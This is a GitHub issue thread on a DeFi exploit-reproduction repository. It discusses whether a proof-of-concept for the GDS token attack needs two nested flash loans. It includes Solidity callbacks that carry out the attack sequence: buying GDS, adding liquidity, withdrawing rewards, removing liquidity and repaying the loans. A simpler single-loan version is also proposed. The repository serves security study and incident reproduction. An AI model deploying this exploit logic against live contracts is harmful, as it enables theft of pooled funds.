in GDS_exp POC, why call twice flashLoan?
guange2015 opened this issue · 2 comments
guange2015 commented
when i test it, once is enough
https://github.com/SunWeb3Sec/DeFiHackLabs/blob/main/src/test/GDS_exp.sol#L104
function executeOperation(
address pool,
address token,
uint256 amount,
uint256 fee,
bytes calldata params
) external{
DODOFLashLoan();
USDT.transfer(address(swapFlashLoan), SwapFlashLoanAmount * 10000 / 9992 + 1000);
}
function DODOFLashLoan() internal{
dodoFlashLoanAmount = USDT.balanceOf(dodo);
DVM(dodo).flashLoan(0, dodoFlashLoanAmount, address(this), new bytes(1));
}
function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external{
USDTToGDS(600_000 * 1e18);
GDSUSDTAddLiquidity(USDT.balanceOf(address(this)), GDS.balanceOf(address(this)));
WithdrawRewardFactory();
GDSUSDTRemovLiquidity();
GDSToUSDT();
USDT.transfer(dodo, dodoFlashLoanAmount);
}
change like this
function executeOperation(
address pool,
address token,
uint256 amount,
uint256 fee,
bytes calldata params
) external{
USDTToGDS(600_000 * 1e18);
GDSUSDTAddLiquidity(USDT.balanceOf(address(this)), GDS.balanceOf(address(this)));
WithdrawRewardFactory();
GDSUSDTRemovLiquidity();
GDSToUSDT();
USDT.transfer(address(swapFlashLoan), SwapFlashLoanAmount * 10000 / 9992 + 1000);
}
zhouxianyuan commented
Sorry, I did not carefully check the specific amount of usdt required in the attack, I just hope to imitate the attacker's behavior as accurately as possible
guange2015 commented
Goodjob, Thank you for clearing my doubts.